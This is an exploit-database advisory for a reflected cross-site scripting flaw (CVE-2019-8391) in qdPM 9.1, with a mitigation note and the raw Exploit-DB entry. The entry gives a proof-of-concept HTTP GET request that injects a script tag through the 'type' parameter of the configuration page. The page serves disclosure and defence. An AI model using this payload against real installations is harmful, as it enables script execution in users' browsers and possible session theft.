qdPM 9.1 - 'type' XSS Injection

vendor:

qdPM

by:

Mehmet EMIROGLU

6.1

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: qdPM

Affected Version From: v9.1

Affected Version To: v9.1

Patch Exists: YES

Related CWE: CVE-2019-8391

CPE: a:qdpm:qdpm:9.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Wamp64, Windows

2019

qdPM 9.1 – ‘type’ XSS Injection

qdPM is a free web-based project management tool suitable for a small team working on multiple projects. It is vulnerable to Cross-Site Scripting (XSS) attacks when the 'type' parameter is manipulated. An attacker can inject malicious JavaScript code into the 'type' parameter, which will be executed in the victim's browser when the vulnerable page is accessed.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized and filtered before being used in the application. Additionally, the application should be configured to use the HTTPOnly flag on all cookies.

Source

Exploit-DB raw data:

===========================================================================================
# Exploit Title: qdPM 9.1 - 'type' XSS Injection
# CVE: CVE-2019-8391.
# Date: 14-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://qdpm.net
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: v9.1
# Category: Webapps
# Tested on: Wamp64, @Win
# Software description:
  Free project management tool for small team
  qdPM is a free web-based project management tool suitable for a small
team working on multiple projects.
  It is fully configurable. You can easy manage Projects, Tasks and People.
Customers interact
  using a Ticket System that is integrated into Task management.
===========================================================================================
# POC - XSS
# Parameters : type
# Attack Pattern : tasks_columns_list<script>bKtx(9366)</script>
# GET Request: http://localhost/qdpm/index.php/configuration
===========================================================================================
GET
/qdpm/index.php/configuration?type=tasks_columns_list<script>bKtx(9366)</script>
HTTP/1.1
Referer: http://localhost/qdPM/
Cookie: qdPM8=se4u27u8rbs04mo61f138b5k3d; sidebar_closed=1
Host: localhost
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*